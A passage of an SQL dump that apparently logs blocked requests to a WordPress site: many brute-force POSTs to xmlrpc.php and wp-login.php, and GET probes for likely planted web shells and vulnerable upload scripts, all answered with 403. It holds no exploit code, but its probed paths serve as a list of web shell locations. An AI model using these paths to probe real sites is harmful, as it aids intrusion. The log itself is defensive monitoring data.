Firefox\\/96\"}','4ynRdNupMPhcx1T5ZbOEYwgi',0,1664666658.0726,1481,'','POST',403,0,515,0,1,'',0),('162.219.250.15',2732325391,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','waK6BDVcjC34GF1T8gPhfXAi',0,1664666346.2823,19349,'','POST',403,0,515,0,1,'',0),('103.74.118.242',1732933362,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','kdE6jiVrB7sXpThLg5U3Pq2C',0,1664666077.8127,18401,'','POST',403,0,515,0,1,'',0),('3.131.4.125',58918013,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Gb239tdzEnD7YxAQ1NCrsXqH',0,1664665519.6312,1915,'','POST',403,0,515,0,1,'',0),('101.99.90.175',1701010095,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','uANP1pYg9QVhXyCJIZLGWSbe',0,1664665191.0486,18952,'','POST',403,0,515,0,1,'',0),('107.189.3.40',1807549224,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit\\/537.76.4 (KHTML, like Gecko) Version\\/7.0.4 Safari\\/537.76.4\"}','w1RziQlBypfce6kUY9ZjMDGE',0,1664671426.1375,7167,'','POST',403,0,600,0,1,'',0),('51.210.251.22',869464854,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','MaASb16H9ZRtJwOcqLdreICh',0,1664669587.6925,18725,'','POST',403,0,515,0,1,'',0),('82.165.184.76',1386592332,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','plHeWNaBdfq3X68ZQyTtSObC',0,1664669828.9270,19624,'','POST',403,0,515,0,1,'',0),('8.210.102.36',148006436,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','aHswLIBEWFMk5UrY6DyqJCNt',0,1664669238.0663,18939,'','POST',403,0,515,0,1,'',0),('120.24.52.65',2014852161,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','kESNLJtyK3r6n2Ij8ifubQzA',0,1664668977.1089,18947,'','POST',403,0,515,0,1,'',0),('51.142.136.99',864979043,'','http://cteisys.com/wp-commentin.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','vjx9ekTI4lhYnF875CS6XUoW',0,1664679313.2958,12287,'','GET',403,0,700,0,1,'',0),('198.98.50.216',3328324312,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.143 Safari\\/537.36\"}','2lfIbARpGZ5Y3LiwVgErx8Sm',0,1664675159.4355,1260,'','POST',403,0,600,0,1,'',0),('20.255.59.83',352271187,'','http://cteisys.com/wp-includes/wp-atom.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','BZzYEfNwpdRF257iJoeDu9h6',0,1664697040.7047,280,'','GET',403,0,700,0,1,'',0),('20.255.59.83',352271187,'','http://cteisys.com/wp-includes/wp-class.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','GarMLxqVBstTFdC50Wy82QnR',0,1664697039.7003,283,'','GET',403,0,700,0,1,'',0),('194.38.20.161',3257275553,'','http://cteisys.com/wp-content/themes/nuance/functions/jwpanel/scripts/valums_uploader/php.php','','{\"1\":\"ALittle Client\"}','awK04vtbPDg1VehkyUZoA25p',0,1664687983.9916,12136,'','GET',403,0,700,0,1,'',0),('198.98.48.183',3328323767,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','lOzhVctvndumxKRZLJf4gYAF',0,1664686288.4699,1256,'','POST',403,0,600,0,1,'',0),('20.255.59.83',352271187,'','http://cteisys.com/wp-content/export.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','qYy10IoRAfeV68murOzJktMF',0,1664697038.6800,281,'','GET',403,0,700,0,1,'',0),('20.255.59.83',352271187,'','http://cteisys.com/export.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','sVvCKAoTudza5pLQbYPf48Wj',0,1664697037.9887,298,'','GET',403,0,700,0,1,'',0),('209.141.47.94',3515690846,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident\\/5.0)\"}','ZM0kwsBNWHRJejFiUGEYt61a',0,1664689909.0817,1269,'','POST',403,0,600,0,1,'',0),('209.141.55.206',3515693006,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko\\/20100101 Firefox\\/24.0\"}','M0GzyTXYHEUkcvL6eNdWS9ZQ',0,1664689619.4073,17408,'','POST',403,0,600,0,1,'',0),('20.255.59.83',352271187,'','http://cteisys.com/media-admin.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','4aqv5uKi1rCGg7dtBeIJXOhy',0,1664697037.1223,301,'','GET',403,0,700,0,1,'',0),('20.255.59.83',352271187,'','http://cteisys.com/ups.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','eu3MGOdBWqAShRokU01Ii5cr',0,1664697035.4874,283,'','GET',403,0,700,0,1,'',0),('20.255.59.83',352271187,'','http://cteisys.com/wp-signin.php?dizo&ping','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','6lzvnSrwWXaZFiPY9AuRB8cJ',0,1664697036.2911,290,'','GET',403,0,700,0,1,'',0),('20.255.59.83',352271187,'','http://cteisys.com/beence.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','c0DC4TWrAZUQSnilYjPzE3aL',0,1664697034.6669,288,'','GET',403,0,700,0,1,'',0),('20.255.59.83',352271187,'','http://cteisys.com/wp_wrong_datlib.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','4Sxn8jmpeJU0CNciPbfAWI3q',0,1664697033.8219,324,'','GET',403,0,700,0,1,'',0),('107.189.14.89',1807552089,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; Trident\\/7.0; rv:11.0) like Gecko\"}','NXhjsTcnGx6eFH1tqLmUl8OE',0,1664691187.1196,17221,'','POST',403,0,600,0,1,'',0),('20.255.59.83',352271187,'','http://cteisys.com/radio.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','IcbOHTGtNJzPnrds45xlFqLm',0,1664697031.7137,338,'','GET',403,0,700,0,1,'',0),('20.255.59.83',352271187,'','http://cteisys.com/doc.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','ScVoCpsGEIrbNawzRJMy5iW9',0,1664697032.6743,289,'','GET',403,0,700,0,1,'',0),('20.255.59.83',352271187,'','http://cteisys.com/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','4XQhMJnYFBDOZcfgKjG95mVU',0,1664697030.1753,985,'','GET',403,0,700,0,1,'',0),('20.255.59.83',352271187,'','http://cteisys.com/s_e.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','Ulz0n8BybmIVJkj5FKOpTo42',0,1664697026.0044,2255,'','GET',403,0,700,0,1,'',0),('20.255.59.83',352271187,'','http://cteisys.com/s_ne.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','QXtyAL1MZUjlK6r0hVSqsE9i',0,1664697028.8286,732,'','GET',403,0,700,0,1,'',0),('20.255.59.83',352271187,'','http://cteisys.com/wp-admin/style.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','u4QXoGHWqws1O6m7zFkRMTxd',0,1664697025.1698,310,'','GET',403,0,700,0,1,'',0),('20.255.59.83',352271187,'','http://cteisys.com/style.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','z47uAcbvTQIwtkUZDhpHefq1',0,1664697024.4002,344,'','GET',403,0,700,0,1,'',0),('107.189.3.40',1807549224,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','tduesP5TCvaxDGRMZ8H3cK9k',0,1664695979.5270,1397,'','POST',403,0,600,0,1,'',0),('178.128.104.173',2994759853,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','jXJfLShcB5n4NWHdiYOuFIg7',0,1664706643.3819,1626,'','POST',403,0,515,0,1,'',0),('148.72.210.140',2487800460,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Dc524BQdphFzMPOLmHXRkAvt',0,1664706361.8698,18961,'','POST',403,0,515,0,1,'',0),('88.214.43.118',1490430838,'','http://cteisys.com/phpinfi.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.129 Safari\\/537.36\"}','oIzV3iYKQS4nLm095cqZHxs1',0,1664702580.3304,11684,'','GET',403,0,700,0,1,'',0),('88.214.43.118',1490430838,'','https://cteisys.com/phpinfi.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.129 Safari\\/537.36\"}','0l8gHoQhmiXcNYLw7PZG1OtK',0,1664702581.8371,10177,'','GET',403,0,700,0,1,'',0),('185.114.247.102',3111319398,'','http://cteisys.com/style.php?sig=rename','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\"}','3DQjNgJi9o5IquChWF6pMRtl',0,1664700521.0995,534,'','GET',403,0,700,0,1,'',0),('209.141.48.210',3515691218,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','w6g2enGybBf0tzHIRud4xm7l',0,1664699046.4520,1204,'','POST',403,0,600,0,1,'',0),('209.141.57.9',3515693321,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','Gpog3AvzJKjkWQ8s9r7cYlPw',0,1664706172.8753,17902,'','POST',403,0,600,0,1,'',0),('67.205.143.236',1137545196,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','6YwdMLAI8bDFCksExXrizZtm',0,1664706075.5853,18528,'','POST',403,0,515,0,1,'',0),('107.151.6.226',1805059810,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','jbNoOawg2csJynYhZAtrX5BR',0,1664704745.8585,2310,'','POST',403,0,515,0,1,'',0),('162.219.250.15',2732325391,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','7roJXz4LQEW92vPs1mTHGgpU',0,1664704427.9575,19145,'','POST',403,0,515,0,1,'',0),('185.225.33.99',3118539107,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','3r5UEaVqQNd4AL0KwsnR96OT',0,1664703764.9763,1436,'','POST',403,0,515,0,1,'',0),('97.79.239.127',1632628607,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','EumIrxAjNHfWvYGlwe4OaXzV',0,1664703396.1092,12575,'','POST',403,0,515,0,1,'',0),('161.35.15.73',2703429449,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','4C1TVO7ZUX0NgAhtzjFvIWYH',0,1664703010.7549,11363,'','POST',403,0,515,0,1,'',0),('101.0.73.142',1694517646,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ugRmMQoDC1e75vBqc2WKtOZk',0,1664705414.7898,18819,'','POST',403,0,515,0,1,'',0),('106.14.141.22',1779338518,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','CdSQNoP3VtM9TJpmnsRIyZAc',0,1664705082.7875,18405,'','POST',403,0,515,0,1,'',0),('194.233.67.171',3270067115,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','3aGLksxwWXfgyMPKUzATmv57',0,1664709817.8607,9362,'','POST',403,0,515,0,1,'',0),('130.61.143.194',2185072578,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','i5VAdewcy3xFmjs8Izfv2QWa',0,1664709582.7183,18512,'','POST',403,0,515,0,1,'',0),('172.105.42.19',2892573203,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','7UY9uMweDAH68cZ3zmqlysLx',0,1664709335.3927,18903,'','POST',403,0,515,0,1,'',0),('109.233.192.83',1844035667,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Jt721g5hMsrxRnBALEvOucVq',0,1664709089.1073,19091,'','POST',403,0,515,0,1,'',0),('35.225.94.95',601972319,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','4z6WTsjZFJ9U1pMSBA8vfkYL',0,1664708600.2695,2618,'','POST',403,0,515,0,1,'',0),('184.168.125.241',3098050033,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','zShd94lLp5fUwQBJZHyxtKqg',0,1664713928.7935,18377,'','POST',403,0,515,0,1,'',0),('209.141.57.9',3515693321,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit\\/537.51.1 (KHTML, like Gecko) GSA\\/4.1.0.31802 Mobile\\/11D257 Safari\\/9537.53\"}','ZcqaBdKhYyjWNOtz5C97mFu6',0,1664713695.6159,1355,'','POST',403,0,600,0,1,'',0),('91.196.124.216',1539603672,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','raOIHAxv73ni5cJpLNuYBXS0',0,1664713642.9359,554,'','POST',403,0,515,0,1,'',0),('35.198.25.12',600185100,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','KWmuZExLykOMtbn7l8giHA6o',0,1664713337.8971,1241,'','POST',403,0,515,0,1,'',0),('186.234.80.121',3135918201,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','JOF5U2xVCLIkfWzqr6AGyBuK',0,1664713047.7623,17764,'','POST',403,0,515,0,1,'',0),('167.172.67.151',2813084567,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ZsFDQGBECmgS0W8XKTHnqOAr',0,1664712484.2958,13231,'','POST',403,0,515,0,1,'',0),('213.165.237.48',3584421168,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','zL04UPHjIc7f6Dh8tAKmwE9g',0,1664712224.3086,17529,'','POST',403,0,515,0,1,'',0),('185.247.139.21',3120007957,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','gbFm0a5eLTH4zC2qf71ryswM',0,1664717385.1103,19198,'','POST',403,0,515,0,1,'',0),('34.68.97.70',574906694,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','yUe2BQIYohdiRntPNOELxuTv',0,1664717060.8483,3034,'','POST',403,0,515,0,1,'',0),('157.230.38.184',2649106104,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','U2H9iswrKJLXMIkThyR3pOfS',0,1664716413.9766,18447,'','POST',403,0,515,0,1,'',0),('51.75.146.208',860590800,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','u0C1HGJzYfesjxkMprVEUiQn',0,1664716109.8601,1245,'','POST',403,0,515,0,1,'',0),('103.74.118.242',1732933362,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','nlRCNEdgf6WSiz27rsUupPGA',0,1664715775.9723,2398,'','POST',403,0,515,0,1,'',0),('185.250.202.147',3120220819,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','8b3pRaYyqSGTOdhvrVWIEsiL',0,1664720403.0392,18662,'','POST',403,0,515,0,1,'',0),('51.178.146.199',867340999,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.212 Safari\\/537.36\"}','xbtFuWa2UJjc4w3lKvr95MGS',0,1664720408.5552,13139,'','POST',403,0,515,0,1,'',0),('109.234.161.93',1844093277,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','YgAyiSU6d5jntVRKGWpmzc7k',0,1664719748.7678,19254,'','POST',403,0,515,0,1,'',0),('188.212.34.36',3168018980,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Zp7u6rmgMRLeIt4AD2XizbkW',0,1664719397.5192,19607,'','POST',403,0,515,0,1,'',0),('81.88.52.216',1364735192,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:17.0) Gecko\\/20100101 Firefox\\/20.6.14\"}','ONLRU5oyEjatm7pdsFqQHK3n',0,1664724213.0802,18561,'','POST',403,0,515,0,1,'',0),('90.156.169.12',1520216332,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','U7I1ESzAZGshf436lge98Woq',0,1664722999.8725,18500,'','POST',403,0,515,0,1,'',0),('51.91.83.187',861623227,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','KNHP2Dxuwv5AGhfTmilWI9b3',0,1664726813.3073,13005,'','POST',403,0,515,0,1,'',0),('68.183.177.20',1152889108,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','XewAtLRKaBnkdxCN8USbhQMo',0,1664726405.9510,18630,'','POST',403,0,515,0,1,'',0),('198.71.48.115',3326554227,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','s72nOJYoiZ3IPTaRqh9MjAfw',0,1664731765.0836,2133,'','POST',403,0,515,0,1,'',0),('185.2.4.98',3103917154,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-X420) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','iKpQgtU6ZcL7v8Rskz1MT35D',0,1664731764.5581,1079,'','POST',403,0,515,0,1,'',0),('177.55.116.248',2973201656,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','2V4XwWkn5vMpGcu3Dtq9CPUx',0,1664731759.7141,915,'','POST',403,0,515,0,1,'',0),('124.221.179.165',2094904229,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','ONPHJK9wG5xUVBcMSo03Qvpt',0,1664731736.9833,18099,'','POST',403,0,515,0,1,'',0),('202.226.37.184',3403818424,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','flhJN9GzdSakx0RvYDyVt1jU',0,1664731739.3542,15727,'','POST',403,0,515,0,1,'',0),('135.181.142.230',2276822758,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko\\/20100101 Firefox\\/59.0\"}','LqI8nvjgoWf9t3PwdscarXCG',0,1664731749.3831,5640,'','POST',403,0,515,0,1,'',0),('185.165.42.75',3114609227,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','qZNdMGecjCWV1AlSy5Iv7OUQ',0,1664730070.1370,19063,'','POST',403,0,515,0,1,'',0),('65.52.67.200',1093944264,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','Le4IdbVQwuh12PRvnaGUrjsO',0,1664747979.3730,1245,'','POST',403,0,515,0,1,'',0),('209.141.36.190',3515688126,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit\\/537.51.1 (KHTML, like Gecko) GSA\\/4.1.0.31802 Mobile\\/11D257 Safari\\/9537.53\"}','025mXvVRlkarG839TIiYU4WN',0,1664736627.6238,1174,'','POST',403,0,600,0,1,'',0),('217.21.74.42',3642051114,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 Safari\\/537.36\"}','SL1kivR3Ch8rsJ9FBD7t4VfA',0,1664735664.6830,454,'','POST',403,0,515,0,1,'',0),('202.61.232.79',3393054799,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','tWxnBA7aLsP9wCVo1MJkZRfF',0,1664735660.6154,518,'','POST',403,0,515,0,1,'',0),('217.21.95.107',3642056555,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko\\/20100101 Firefox\\/65.0\"}','dJUa3u1mr0W4pqzRFwHlXkt8',0,1664735659.4409,463,'','POST',403,0,515,0,1,'',0),('84.22.153.127',1410767231,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','Vrwu0Px8zvdfeQNMU79mi1CB',0,1664735647.9924,493,'','POST',403,0,515,0,1,'',0),('34.176.167.92',582002524,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','RUxIKwWu5BiENC6smoyXVaFD',0,1664735647.0694,467,'','POST',403,0,515,0,1,'',0),('46.29.50.200',773665480,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','Om57EoWbLa2Acizvj3N4YwV1',0,1664735641.8570,1289,'','POST',403,0,515,0,1,'',0),('178.170.41.94',2997496158,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.138 Safari\\/537.36\"}','8qeKfnZBpL7OT5RQASWxY3N9',0,1664735633.5142,507,'','POST',403,0,515,0,1,'',0),('47.242.115.115',804418419,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko\\/20041107 Firefox\\/1.0\"}','K9SnO60uaX3JkQqHV2PIRxW7',0,1664735631.2912,1229,'','POST',403,0,515,0,1,'',0),('185.224.138.16',3118500368,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-G960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile 